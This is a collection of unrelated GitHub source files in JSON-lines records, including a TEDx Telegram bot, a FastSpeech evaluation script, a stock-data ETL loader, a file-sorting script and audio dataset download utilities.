Output : A list containing minimum and maximum bounds for each leaf of a cut element\n \n \"\"\" \n if(self.myfather==None):\n del Leaves[:]\n \n if (self.myChildren!= None):\n for children in self.myChildren:\n children.Return_Leaves_list()\n else:\n QuadTree.myNoOfLeaves+=1\n temp=[(self.myXmin,self.myYmin),(self.myXmax,self.myYmax)]\n if temp not in Leaves:\n Leaves.append(temp)\n \n return Leaves\n \n \n def Integration_Input(self):\n \n \"\"\"\n This function creates the label of each node.\n for e.g, if a node has the following label [4,2,1]. This means:\n 4 -> parent node in level 1\n 2 -> parent node in level 2\n 1 -> node ID in level 2\n \n Input: The current object\n Output: None\n \"\"\"\n if self.myfather != None:\n for i in range (0,len(self.myfather.label)):\n self.label.append(self.myfather.label[i])\n self.label.append(self.ID)\n\n \n def Return_Label_list(self, Label):\n \"\"\"\n This function returns the label for each leaf of a cut element\n for e.g, if a leaf has the following label [4,2,1]. This means:\n 4 -> parent node in level 1\n 2 -> parent node in level 2\n 1 -> leaf node in level 2\n \n Input : The cut element object\n Output : None\n \n \"\"\" \n if(self.myfather==None):\n del Label[:]\n \n if (self.myChildren != None):\n for children in self.myChildren:\n children.Return_Label_list(Label)\n if children.myStringCode !='2':\n temp = children.label\n Label.append(temp)\n \n \n def plotTreeToConsole(self):\n \"\"\"\n This function plots the Quad tree of a cut element to console\n \n Input : The cut element object\n Output : None\n \n \"\"\" \n x,y = self.myCell.exterior.xy\n plt.plot(x,y, color='blue',linewidth = 1.0)\n if (self.myChildren != None):\n for children in self.myChildren:\n children.plotTreeToConsole()\n \n \n","repo_name":"Msalmanyousaf/FCM_in_Abaqus","sub_path":"Python Scripts/My_CutCell_QuadTree.py","file_name":"My_CutCell_QuadTree.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36136204168","text":"import os\nimport time\nfrom typing import List\n\nfrom flask import Flask, request\n\nimport telebot\n\nfrom app import markups, mongo\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nTOKEN = os.environ[\"TOKEN\"]\nPHOTO_ID = os.environ[\"PHOTO_ID\"]\nCHANNEL = os.environ[\"CHANNEL\"]\nADMIN = os.environ[\"ADMIN\"]\n\nbot = telebot.TeleBot(TOKEN)\nserver = Flask(__name__)\n\ndef send_messages(ids: List[str], func, **kwargs):\n count = 0\n for id in ids:\n try:\n func(id, **kwargs)\n count += 1\n except:\n continue\n if count % 20 == 0:\n time.sleep(.7)\n\n\n@bot.message_handler(commands=[\"start\"], chat_types=[\"private\"])\ndef start(message):\n \"\"\"\n Handle start messages\n \"\"\"\n user = message.from_user\n if user.id == int(ADMIN):\n message = '''Hi Admin, any messsage you send to the bot would be broadcast to all users\n\nExample\n```\n/sendphoto\nI am the tedx Bot\n```\n\nThis would send the a photo with the caption \"I am the tedx Bot\" to all abot users\n\nAny message sent to the bot that is not a /start message would be broadcast to all users\n'''\n bot.send_message(user.id, text=message, parse_mode='MarkdownV2')\n return\n\n # Add new user to the broadcasting database\n mongo.insert_new_user(\n id=user.id,\n username=user.username,\n first_name=user.first_name,\n last_name=user.last_name,\n )\n\n message_text_list = message.text.split(\" \")\n users_firstname = user.first_name.split(\" \")[0]\n\n # Updates referal if the start message is more than length of 1 string\n if len(message_text_list) > 1:\n mongo.update_referral(message_text_list[-1], user.id)\n\n # Reply /start message\n bot.send_photo(\n message.chat.id,\n caption=f\"Hi {users_firstname.title()}, My name is Alex 👨‍✈️, the TEDxbot, and I am here to make your experience memorable.\",\n photo=PHOTO_ID,\n reply_markup=markups.get_start_markup(),\n )\n\n\n@bot.callback_query_handler(func=lambda call: call.data == \"start\")\ndef start_query_handler(call):\n \"\"\"\n Handle the \"start\" Callback query\n \"\"\"\n # Initialise variables\n user_id = call.from_user.id\n chat_id = call.message.chat.id\n\n # Check if user is a member of TEDx Channel, if not, end function execution\n if bot.get_chat_member(CHANNEL, user_id=user_id).status == \"left\":\n bot.send_message(\n chat_id,\n text=\"You're not a member of the channel⁉\\n\\\nYou need to join the [TEDxCovenantUniversity Channel](https://t.me/tedxcovenantuniversity)\",\n parse_mode=\"MarkdownV2\",\n )\n\n bot.send_message(\n chat_id,\n text=\"I have joined the channel\",\n reply_markup=markups.get_start_markup(),\n )\n return\n\n else:\n bot.send_message(\n chat_id,\n text=\"✅Thank you for joining the \\\nTEDxCovenantUniversity Community\",\n parse_mode=\"MarkdownV2\",\n reply_markup=markups.get_next_markup(),\n )\n\n\n@bot.callback_query_handler(func=lambda call: call.data == \"link\")\ndef get_referral_link(call):\n # Creates a referral link for the user and adds them as a participant\n\n user = call.from_user\n chat = call.message.chat\n link_caption = (\n \"You can share this link with your friends and win some amazing prizes🤑\\n\"\n )\n\n # Checks if user has a telegram usename\n if not user.username:\n bot.send_message(\n chat.id,\n text=f\"{link_caption}\\nhttps://t.me/tedxcu_bot/?start=_0_{user.id}_\",\n )\n else:\n bot.send_message(\n chat.id,\n text=f\"{link_caption}\\nhttps://t.me/tedxcu_bot/?start=_{user.username}_0_{user.id}_\",\n )\n\n mongo.insert_new_participant(\n id=user.id,\n username=user.username,\n first_name=user.first_name,\n last_name=user.last_name,\n )\n\n\n@bot.message_handler(func=lambda message: message.text.startswith(\"/sendphoto\"))\ndef broadcast_image(message):\n \"\"\"\n Handles messages with meant for image captions\n \"\"\"\n # Check if User is admin\n if message.from_user.id != int(ADMIN):\n return\n\n # Remove \"/sendphoto\" from message.text\n caption = \"\\n\".join(message.text.split(\"\\n\")[1:])\n\n # Broadcast image with message.text as caption\n image_id = mongo.get_image_id()\n\n user_ids = mongo.get_ids()\n send_messages(user_ids, func=bot.send_photo, photo=image_id, caption=caption)\n\n\n@bot.message_handler(func=lambda message: message.from_user.id == int(ADMIN))\ndef broadcast_message(message):\n \"\"\"\n Brodcasts messages from admin to all bot users\n \"\"\"\n user_ids = mongo.get_ids()\n send_messages(user_ids, func=bot.send_message, text=message.text)\n\n\n@bot.message_handler(content_types=[\"photo\"])\ndef save_image(message):\n \"\"\"\n Get's image ID from message and upload to Mongo\n \"\"\"\n if message.from_user.id != int(ADMIN):\n return\n image_id = message.photo[0].file_id\n mongo.change_image_id(image_id)\n\n\n@server.route(\"/\" + TOKEN, methods=[\"POST\"])\ndef getMessage():\n json_string = request.get_data().decode(\"utf-8\")\n update = telebot.types.Update.de_json(json_string)\n bot.process_new_updates([update])\n return \"!\", 200\n\n\n@server.route(\"/\")\ndef webhook():\n bot.remove_webhook()\n bot.set_webhook(url=\"https://tedx-cu-bot.herokuapp.com/\" + TOKEN)\n return \"!\", 200\n\n\nif __name__ == \"__main__\":\n server.run(host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 5000)))\n","repo_name":"HackerManPeter/tedx-covenant-university-telegram-bot","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27605043927","text":"import torch\nimport torch.nn as nn\nimport argparse\nimport numpy as np\nimport random\nimport time\nimport shutil\nimport os\nimport matplotlib.pyplot as plt\n\nimport hparams as hp\nimport audio\nimport utils\nimport dataset\nimport text\nimport model as M\nimport waveglow\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef get_DNN(num):\n checkpoint_path = \"checkpoint_\" + str(num) + \".pth.tar\"\n model = nn.DataParallel(M.FastSpeech()).to(device)\n model.load_state_dict(torch.load(os.path.join(hp.checkpoint_path,\n checkpoint_path))['model'])\n model.eval()\n return model\n\n\ndef synthesis(model, phn, alpha=1.0):\n text = np.array(phn)\n text = np.stack([text])\n src_pos = np.array([i+1 for i in range(text.shape[1])])\n src_pos = np.stack([src_pos])\n sequence = torch.from_numpy(text).cuda().long()\n src_pos = torch.from_numpy(src_pos).cuda().long()\n\n with torch.no_grad():\n _, mel = model.module.forward(sequence, src_pos, alpha=alpha)\n return mel[0].cpu().transpose(0, 1), mel.contiguous().transpose(1, 2)\n\n\ndef get_data():\n test1 = \"Accept the things to which fate binds you, and love the people with whom fate brings you together, but do so with all your heart\"\n test2 = \"We suffer more often in imagination than in reality\"\n test3 = \"Wasserstein distance or Kantorovich Rubinstein metric is a distance function defined between probability distributions on a given metric space\"\n\n data_list = list()\n data_list.append(text.text_to_sequence(test1, hp.text_cleaners))\n data_list.append(text.text_to_sequence(test2, hp.text_cleaners))\n data_list.append(text.text_to_sequence(test3, hp.text_cleaners))\n\n return data_list\n\n\nif __name__ == \"__main__\":\n # Test\n wave_glow = torch.hub.load('NVIDIA/DeepLearningExamples:torchhub', 'nvidia_waveglow', model_math='fp32')\n wave_glow = wave_glow.remove_weightnorm(wave_glow)\n wave_glow.cuda().eval()\n WaveGlow = wave_glow\n parser = argparse.ArgumentParser()\n parser.add_argument('--step', type=int, default=18000)\n parser.add_argument(\"--alpha\", type=float, default=1.0)\n args = parser.parse_args()\n\n print(\"use griffin-lim and waveglow\")\n model = get_DNN(args.step)\n data_list = get_data()\n for i, phn in enumerate(data_list):\n mel, mel_cuda = synthesis(model, phn, args.alpha)\n if not os.path.exists(\"results\"):\n os.mkdir(\"results\")\n plt.figure(figsize=(20,5))\n plt.imshow(mel_cuda.detach().cpu()[0], aspect='auto', origin='lower')\n plt.savefig(\"results/\"+str(args.step)+\"_\"+str(i)+\".png\")\n audio.tools.inv_mel_spec(\n mel, \"results/\"+str(args.step)+\"_\"+str(i)+\".wav\")\n waveglow.inference.inference(\n mel_cuda, WaveGlow,\n \"results/\"+str(args.step)+\"_\"+str(i)+\"_waveglow.wav\")\n print(\"Done\", i + 1)\n\n s_t = time.perf_counter()\n for i in range(100):\n for _, phn in enumerate(data_list):\n _, _, = synthesis(model, phn, args.alpha)\n print(i)\n e_t = time.perf_counter()\n print((e_t - s_t) / 100.)\n","repo_name":"glycine-addict/FastSpeech","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16747544965","text":"from cgitb import reset\nfrom json import load\nimport telebot\nimport dotenv\nimport requests\nfrom bs4 import BeautifulSoup\nfrom pathlib import Path\nimport os\n\ndef load_envs(path: str) -> str:\n dotenv_path = Path(path)\n dotenv.load_dotenv(dotenv_path=dotenv_path)\n\nTELEGRAM_TOKEN = os.getenv(\"TELEGRAM_TOKEN\")\n\ndef parse_table(url):\n SNILS = os.getenv(\"SNILS\")\n snils_list = SNILS.split(',')\n html_text = requests.get(url)\n soup = BeautifulSoup(html_text.content, 'html5lib')\n table = soup.find(\"table\", class_=\"namesTable\")\n i = 0\n pos = {}\n for row in table.find_all(attrs={'class':'fio'})[1:]:\n i += 1\n if row.text in snils_list:\n pos.update({f\"{i}\":f\"{row.text}\"})\n return pos\n\n\ndef main():\n # bot = telebot.TeleBot(TELEGRAM_TOKEN)\n load_envs('../.env')\n parse_table('https://priem.mirea.ru/accepted-entrants-list/personal_code_rating.php?competition=1714961437918539062&prior=any&documentType=original&accepted=1&acceptedEntrant=any&onlyActive=1&onlyPaid=0')\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"nocturnalq/mirea_committee_bot","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25456853054","text":"import os, json\nfrom datetime import datetime\nfrom Common.dw_tables import dw_conn, fact_table\nimport sqlalchemy\nfrom sqlalchemy import text\n\n\ncurrent_file = __file__ # Gets the current file path\nparent_directory = os.path.abspath(os.path.join(current_file, os.pardir))\n\ndef load_historical_stock_data():\n stocks = dw_conn.execute(text(\"\"\"SELECT \"Ma_cp\" FROM thong_tin_co_phieu WHERE \"Nganh\" <> 'Chứng quyền'\"\"\")).fetchall()\n jfile = open(f'{parent_directory}/Extract/Stocks_Price/historical_stocks_data.json', encoding='utf-8')\n data_obj = json.load(jfile)\n times = dw_conn.execute(text('SELECT \"Thoi_gian\" FROM thoi_gian')).fetchall()\n\n for stock in stocks:\n for day in data_obj[stock[0]]:\n if day['date'] == \"Ngày\" or day['close_price'][0] == \"Đóng cửa\":\n continue\n else:\n time = datetime.strptime(day['date'], '%d/%m/%Y')\n if(time.date(),) not in times:\n continue\n time_str = time.strftime('%Y-%m-%d')\n query = sqlalchemy.insert(fact_table).values(\n Thoi_gian = time,\n scj_id = 'scj_' + time_str,\n nl_id = 'nl_' + time_str,\n ls_id = 'ls_' + time_str,\n Ma_cp = stock[0],\n Gia_dong_cua = float(day['close_price'][0].replace(',', '.')),\n Thay_doi_phan_tram = day['change%'] if day['change%'] == 0.0 else float(day['change%'].replace('%', '').replace(',', '.')),\n Thay_doi = day['change'] if day['change'] == 0.0 else float(day['change'].replace(',', '')),\n Gia_thap_nhat = float(day['lowest'].replace(',', '.')),\n Gia_cao_nhat = float(day['highest'].replace(',', '.')),\n Tong_KLGD = float(day['kl'].replace('.', '')) \n )\n\n dw_conn.execute(query)\n\n\nif __name__ == \"__main__\": \n load_historical_stock_data()\n","repo_name":"Tran-Quang-Phuc/Data_Pipeline","sub_path":"dags/ETL_Manager/load_historical_main_transactions.py","file_name":"load_historical_main_transactions.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21303062745","text":"##########################scrivo nome cartella nel file di python-->scorrendo i file ogni volta legge il contenuto del file e li sposta nella cartella corrispondente se all interno c e scritto il nome della cartella\n#per esempio se nel file c e scritto cartella=PROVA , legge il file e sposta il file nella cartella prova(se esiste)\n\n\n##SPOSTA IL FILE IN UNA CARTELLA SE NEL FILE E CONTENUTO IL NOME DI QUELLA CARTELLA \t\tNEL FILE C E SCRITTO CARTELLA==nomecartella per esempio sse si chima fibonacci \t\t\tCARTELLA==fibonacci\nimport os\nimport shutil\npath=\"C:\\\\Users\\\\Attilio\\\\Desktop\\\\file_python\\\\\"\nos.startfile(path)\n# ~ os.rename(\"path/to/current/file.foo\", \"path/to/new/destination/for/file.foo\")\n# ~ os.replace(\"path/to/current/file.foo\", \"path/to/new/destination/for/file.foo\")\n\n# ~ direcory=[f for f in path.iterdir() if f.is_dir()]\n# ~ shutil.move(\"C:\\\\Users\\\\Attilio\\\\Desktop\\\\file_python\\\\tk_inter_input\\\\hellotxt\", \"C:\\\\Users\\\\Attilio\\\\Desktop\\\\file_python\\\\tk_inter_input\\\\hello\\\\hellotxt\")\n# ~ os.walk(directory)\n#CARTELLA==fibonacci\n\n\n# ~ print(os.path.isdir(path1))\n# ~ print(os.listdir(path)) # returns list\n# ~ print\nlistafiles=[]\nlistafolders=[]\n\nfor x in os.listdir(path):#guarda dentro questa cartella e se ci sono cartelle dimmi come si chiamano\n\tpath1=path+\"\\\\\"+str(x)\t#path per accedere a file e cartelle\n\tif (os.path.isdir(path+\"\\\\\"+x))==True:\n\t\tlistafolders.append(x)\n\t\t\t# ~ print(x)\n\telse:\n\t\tlistafiles.append(x)\n# ~ print(listafolders)\t\n# ~ print(listafiles)# ~ print(x)\n#uguale\n#VUOI SPOSTARE QUESTO FILE IN UNA CARTELLA=? si sceglie nome cartella solo allinizio\n#dato un pezzo di stringa cerca nomi file che contengono quella strigna e li sposta nella cartella con un nome simile(perchü anch essa continene la stringa)\n# ~ while True:\n\t# ~ stringa1=input(\"str\t\t\")#inserire pezzo di nome in comune tra files e cartelle\n# ~ print(listafiles)\t\n\t# ~ stringa2=\n\t# ~ stringa=stringa1.lower()\nnomefile_corrente=os.path.basename(__file__)\n# ~ print(\"nomequestofile_su_cui_sto_scrivendo\t\t\",nomefile_corrente)\nfor x in listafiles:\n\t\t# ~ print(\"nome file\t\",x)\n\t\t# ~ cartella_destinazione=input(\"nome cartella destinazione\t(press enter to skip)\"\t)\n\t\t# ~ minuscolo=x.lower()\n\t\n\t\t# ~ if cartella_destinazione!=\"\":\n\t\t\t# ~ vuoi_spostare=input(\" vuoi spostare questo file %s, nella cartella %s (enter yes or y if u want) press enter if u dont want?\"%(minuscolo,cartella_destinazione))\n\t\t\t# ~ if vuoi_spostare==\"yes\" or \"y\":\n\t\t\t# ~ print(dove)\n\t\t\n\t\tpathfile=\"C:\\\\Users\\\\Attilio\\\\Desktop\\\\file_python\\\\\"+str(x)\n\t\tif x!=nomefile_corrente:\n\t\t\t# ~ print(x)\n\t\t\t\t\t\n\t\t\t\t\t\t\t# ~ print(pathfile)\n\t\t\t\t\t\t\t# ~ print(pathdestinazione)\n\t\t\t\t\t\t\t# ~ if str(cartella) in str(x):\n#def ciao():\t\t\t\t\t\t# ~ print(str(x))\n\t\t\ttry:\t\t\t\n\t\t\t\t\twith open(pathfile) as f:\n\t\t\t\t\t\n\t\t\t\t\t\tlines = f.readlines()\t\t\t\n\t\t\t\t\t\t# ~ print(lines)\n\t\t\t\t\tcartella_destinazione=\"\"\t\n\t\t\t\t\tfor y in lines:\n\t\t\t\t\t\tif \"CARTELLA==alarm_clock\" in y:\n\t\t\t\t\t\t\tcartella_destinazione=\"alarm_clock\"\n\t\t\t\t\t\t\t# ~ cartella_destinazione=cartella_destinazione\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tpathdestinazione=\"C:\\\\Users\\\\Attilio\\\\Desktop\\\\file_python\\\\\"+str(cartella_destinazione)+\"\\\\\"+str(x)\n\t\t\t\t\t\t\tshutil.move(pathfile, pathdestinazione)\t\n\t\t\t\t\t\t\tprint(x)\n\t\t\texcept:\n\t\t\t\tcontinue\n\n\t\t\n\t\t\t\t#\n\t\t\t\t\t\t# ~ print(\"e una prova\")\n\t\t\t\t\t\t# ~ try:\t\t\t\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t# ~ except:\n\t\t\t\t\t# ~ print(\"error , this folder does not exist\")\n\t\t\t\t\t# ~ continue\n\t\t\t# ~ if stringa in minuscolo:\n\t\t\t\t# ~ print(\"Misha %s and %s around\"%('walked',x))\n\n\t\t\t\t# ~ print()\n\t\t\t\t# ~ if yes_or_no==\"yes\" or \"y\":\n\t\t\t\t# ~ print(x)\n\t\t\t\t# ~ for cartella1 in listafolders:\n\t\t\t\t\t# ~ cartella=cartella1.lower()\n\t\t\t\t\t# ~ if stringa in cartella:\n\t\t\t\t\t\t# ~ print(cartella)\n\t\t\t# ~ if \"matr\" in cartella:\n\t\t\t\t# ~ print(cartella)\n\t\t\t\t# ~ print(cartella)\n\t\t\t\t\n\t\t\t\t# ~ if \"matr\" in x:\n\t\t\t\t\t# ~ print(x)\n\t\t\t\t# ~ if cartella in x:\n\t\t\t\t\t# ~ print(x) \n\t\t\t\t\n\t\t\t\t\t# ~ print(x)\n\t\t\t\t\t\n\t\t\t\t\t# ~ if listafolders[0] in x:\n\t\t\t\t\t\t# ~ print(\"ciao\")\t\ndef ciao():\n\tdef sposta_nella_cartella_prova_se_e_una_prova():\n\t\t#per capire se e una prova apre il file e legge se nel file ci e scritto fileprova\n\t\twith open(\"C:\\\\Users\\\\Attilio\\\\Desktop\\\\file_python\\\\tk_inter_input\"+\"\\\\tkmusic.py\") as f:\n\t\t\tlines = f.readlines()\t\t\t\n\t\t\tprint(lines)\n\n\t\tfor x in lines:\n\t\t\tif \"fileprova\" in x:\n\t\t\t\tprint(\"e una prova\")\n\t# ~ print(x)\n# ~ if \"fileprova\" in lines:\n\t# ~ print(\"ciaociao\")\n\t\n\t# ~ print(\"ce\")\n# ~ print(path1)\n# ~ pathfile=path1+\"\\\\\"+str(\"hello2.txt\")\n# ~ print(pathfile)\t\n# ~ pathdestinazione=path1+\"\\\\\"+str(listafolders[0])+\"\\\\\"+str(\"hello2.txt\")\n# ~ print(pathdestinazione)\n\t\t# ~ print(os.path.isdir(path1))\n\t\t# ~ print(os.listdir(path))\n# ~ import os\n# pathfile=path1+\"\\\\\"+str(x)\n# ~ print(pathfile)\t\n# ~ pathdestinazione=path1+\"\\\\\"+str(listafolders[0])+\"\\\\\"+str(x)~ import shutil\n\n# ~ os.rename(\"path/to/current/file.foo\", \"path/to/new/destination/for/file.foo\")\n# ~ os.replace(\"path/to/current/file.foo\", \"path/to/new/destination/for/file.foo\")\n","repo_name":"paolocassina2/file_python2","sub_path":"file_python/metti_ordine_cartelle/esegui_per_ordinare_cartella/sortdirctory5.py","file_name":"sortdirctory5.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43648510589","text":"from dataclasses import dataclass\n\nfrom fastapi import FastAPI, APIRouter\nfrom fastapi.responses import JSONResponse\nfrom fastapi import Response, Depends\n\n# all routes\nfrom routers import playlist_action, search_music\n\n# from Model.schema import UserRegistration\n\n\n\n# server initilzation with configs\napp = FastAPI(\n title=\"Synched\",\n description=\"An app to help DJs find compatible songs by\\n **BPM, GENRE, COUNTRY AND POPULARITY**\",\n version=\"0.0.1\",\n contact={\n \"name\": \"Shadrack Meoli\",\n \"email\": \"shadcodes@gmail.com\"\n },\n redoc_url=\"/redoc\"\n)\n\n\n# pluging in the routes to the entry file\napp.include_router(playlist_action.router)\napp.include_router(search_music.router)","repo_name":"shadmeoli/Synched","sub_path":"server/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"14782847064","text":"'''\nhttps://leetcode.com/problems/patching-array/\n\nGiven a sorted positive integer array nums and an integer n, add/patch elements to the array such that any number in range [1, n] inclusive can be formed by the sum of some elements in the array. Return the minimum number of patches required.\n\nExample 1:\nnums = [1, 3], n = 6\nReturn 1.\n\nCombinations of nums are [1], [3], [1,3], which form possible sums of: 1, 3, 4.\nNow if we add/patch 2 to nums, the combinations are: [1], [2], [3], [1,3], [2,3], [1,2,3].\nPossible sums are 1, 2, 3, 4, 5, 6, which now covers the range [1, 6].\nSo we only need 1 patch.\n\nExample 2:\nnums = [1, 5, 10], n = 20\nReturn 2.\nThe two patches can be [2, 4].\n\nExample 3:\nnums = [1, 2, 2], n = 5\nReturn 0.\n'''\n\nclass Solution(object):\n def minPatches(self, nums, n):\n \"\"\"\n :type nums: List[int]\n :type n: int\n :rtype: int\n \"\"\"\n i = 0\n bound = 1 # we can cover [0, bound)\n ans = 0\n while bound <= n:\n if i < len(nums) and nums[i] <= bound:\n bound += nums[i]\n i += 1\n else:\n ans += 1\n bound *= 2\n return ans\n\n\nif __name__ == '__main__':\n f = Solution().minPatches\n assert f([], 8) == 4\n assert f([1, 3], 6) == 1\n assert f([1, 5, 10], 20) == 2\n assert f([1, 2, 2], 5) == 0\n assert f([1, 2, 31, 33], 2147483647) == 28\n","repo_name":"irachex/leetcode","sub_path":"patching-array.py","file_name":"patching-array.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"10643601408","text":"\r\nimport hashlib\r\nimport eel\r\n\r\neel.init('Index')\r\nx = ''\r\ny = ''\r\n\r\n@eel.expose\r\ndef browsefunc(path):\r\n global x\r\n hash_md5 = hashlib.md5()\r\n with open(path, \"rb\") as f:\r\n for chunk in iter(lambda: f.read(4096), b\"\"):\r\n hash_md5.update(chunk)\r\n code1 = hash_md5.digest()\r\n x = code1\r\n \r\n@eel.expose\r\ndef browsefunc1(path2):\r\n global y\r\n hash_md5 = hashlib.md5()\r\n with open(path2, \"rb\") as f:\r\n for chunk in iter(lambda: f.read(4096), b\"\"):\r\n hash_md5.update(chunk)\r\n code1 = hash_md5.digest()\r\n y = code1\r\n \r\n@eel.expose \r\ndef gofunc():\r\n global x,y\r\n if x == y:\r\n return \"Both are same\"\r\n else:\r\n return \"They are different\"\r\n \r\n \r\neel.start('index.html') ","repo_name":"rudra98/GUI","sub_path":"py with js/testGUI.py","file_name":"testGUI.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36442075998","text":"import os\nimport subprocess\nfrom warnings import warn\nimport urllib\nimport tarfile\n\nfrom tqdm import tqdm\nimport numpy as np\nimport audiofile as af\nfrom torch.utils.data import Subset\n\nfrom ..utils import run_worker_threads\n\n\n__doctest_skip__ = ['load']\n\n\ndef load(\n filename,\n *,\n duration=None,\n offset=0,\n):\n r\"\"\"Load audio file.\n\n If an error occurrs during loading as the file could not be found,\n is empty, or has the wrong format an empty signal is returned and a warning\n shown.\n\n Args:\n file (str or int or file-like object): file name of input audio file\n duration (float, optional): return only a specified duration in\n seconds. Default: `None`\n offset (float, optional): start reading at offset in seconds.\n Default: `0`\n\n Returns:\n tuple:\n\n * **numpy.ndarray**: two-dimensional array with shape\n `(channels, samples)`\n * **int**: sample rate of the audio file\n\n Example:\n >>> signal, sampling_rate = load('speech.wav')\n\n \"\"\"\n signal = np.array([[]]) # empty signal of shape (1, 0)\n sampling_rate = None\n try:\n signal, sampling_rate = af.read(filename,\n duration=duration,\n offset=offset,\n always_2d=True)\n except ValueError:\n warn(f'File opening error for: {filename}', UserWarning)\n except (IOError, FileNotFoundError):\n warn(f'File does not exist: {filename}', UserWarning)\n except RuntimeError:\n warn(f'Runtime error for file: {filename}', UserWarning)\n except subprocess.CalledProcessError:\n warn(f'ffmpeg conversion failed for: {filename}', UserWarning)\n return signal, sampling_rate\n\n\ndef download_url(\n url,\n root,\n *,\n filename=None,\n md5=None,\n):\n r\"\"\"Download a file from an url to a specified directory.\n\n Args:\n url (str): URL to download file from\n root (str): directory to place downloaded file in\n filename (str, optional): name to save the file under.\n If `None`, use basename of URL. Default: `None`\n md5 (str, optional): MD5 checksum of the download.\n If None, do not check. Default: `None`\n\n Returns:\n str: path to downloaded file\n\n \"\"\"\n root = safe_path(root)\n if not filename:\n filename = os.path.basename(url)\n filename = os.path.join(root, filename)\n\n os.makedirs(root, exist_ok=True)\n\n # downloads file\n if not os.path.isfile(filename):\n bar_updater = _gen_bar_updater(tqdm(unit='B', unit_scale=True))\n try:\n print('Downloading ' + url + ' to ' + filename)\n urllib.request.urlretrieve(url, filename, reporthook=bar_updater)\n except OSError:\n if url[:5] == 'https':\n url = url.replace('https:', 'http:')\n print('Failed download. Trying https -> http instead.'\n ' Downloading ' + url + ' to ' + filename)\n urllib.request.urlretrieve(url, filename,\n reporthook=bar_updater)\n return safe_path(filename)\n\n\ndef download_url_list(\n urls,\n root,\n *,\n num_workers=0,\n):\n r\"\"\"Download files from a list of URLs to a specified directory.\n\n Args:\n urls (list of str or dict): either list of URLs or dictionary\n with URLs as keys and with either filenames or tuples of\n filename and MD5 checksum as values. Uses basename of URL if\n filename is `None`. Performs no check if MD5 checksum is `None`\n root (str): directory to place downloaded files in\n num_workers (int, optional): number of worker threads\n (0 = len(urls)). Default: `0`\n\n \"\"\"\n # always convert to dict\n if type(urls) is list:\n urls = {x: None for x in urls}\n\n # download file and extract\n def _task(url, filename):\n md5 = None\n if type(filename) is tuple:\n filename, md5 = filename\n return download_url(url, root, filename=filename, md5=md5)\n\n # start workers\n params = [(url, filename) for url, filename in urls.items()]\n return run_worker_threads(num_workers, _task, params)\n\n\ndef extract_archive(\n filename,\n *,\n out_path=None,\n remove_finished=False,\n):\n r\"\"\"Extract archive.\n\n Currently `tar.gz` and `tar` archives are supported.\n\n Args:\n filename (str): path to archive\n out_path (str, optional): extract archive in this folder.\n Default: folder where archive is located in\n remove_finished (bool, optional): if `True` remove archive after\n extraction. Default: `False`\n\n \"\"\"\n print(f'Extracting {filename}')\n if out_path is None:\n out_path = os.path.dirname(filename)\n if filename.endswith('tar.gz'):\n tar = tarfile.open(filename, 'r:gz')\n elif filename.endswith('tar'):\n tar = tarfile.open(filename, 'r:')\n else:\n raise RuntimeError('Archive format not supported.')\n tar.extractall(path=out_path)\n tar.close()\n if remove_finished:\n os.unlink(filename)\n\n\ndef sampling_rate_after_transform(\n dataset,\n):\n r\"\"\"Sampling rate of data set after all transforms are applied.\n\n A change of sampling rate by a transform is only recognized, if that\n transform has the attribute :attr:`output_sampling_rate`.\n\n Args:\n dataset (torch.utils.data.Dataset): data set with `sampling_rate`\n attribute or property\n\n Returns:\n int: sampling rate in Hz after all transforms are applied\n\n Example:\n >>> from audtorch import datasets, transforms\n >>> t = transforms.Resample(input_sampling_rate=16000,\n ... output_sampling_rate=8000)\n >>> data = datasets.WhiteNoise(sampling_rate=16000, transform=t)\n >>> sampling_rate_after_transform(data)\n 8000\n\n \"\"\"\n sampling_rate = dataset.original_sampling_rate\n try:\n # List of composed transforms\n transforms = dataset.transform.transforms\n except AttributeError:\n # Single transform\n transforms = [dataset.transform]\n for transform in transforms:\n if hasattr(transform, 'output_sampling_rate'):\n sampling_rate = transform.output_sampling_rate\n return sampling_rate\n\n\ndef ensure_same_sampling_rate(\n datasets,\n):\n r\"\"\"Raise error if provided data set differ in sampling rate.\n\n All data sets that are checked need to have a `sampling_rate` attribute or\n property.\n\n Args:\n datasets (list of torch.utils.data.Dataset): list of at least two audio\n data sets.\n\n \"\"\"\n for dataset in datasets:\n if not hasattr(dataset, 'sampling_rate'):\n raise RuntimeError(\n f\"{dataset} doesn't have a `sampling_rate` attribute.\"\n )\n for n in range(1, len(datasets)):\n if datasets[0].sampling_rate != datasets[n].sampling_rate:\n error_msg = 'Sampling rates do not match:\\n'\n for dataset in datasets:\n info = dataset.__repr__()\n error_msg += f'{dataset.sampling_rate}Hz from {info}'\n raise ValueError(error_msg)\n\n\ndef ensure_df_columns_contain(\n df,\n labels,\n):\n r\"\"\"Raise error if list of labels are not in dataframe columns.\n\n Args:\n df (pandas.dataframe): data frame\n labels (list of str): labels to be expected in 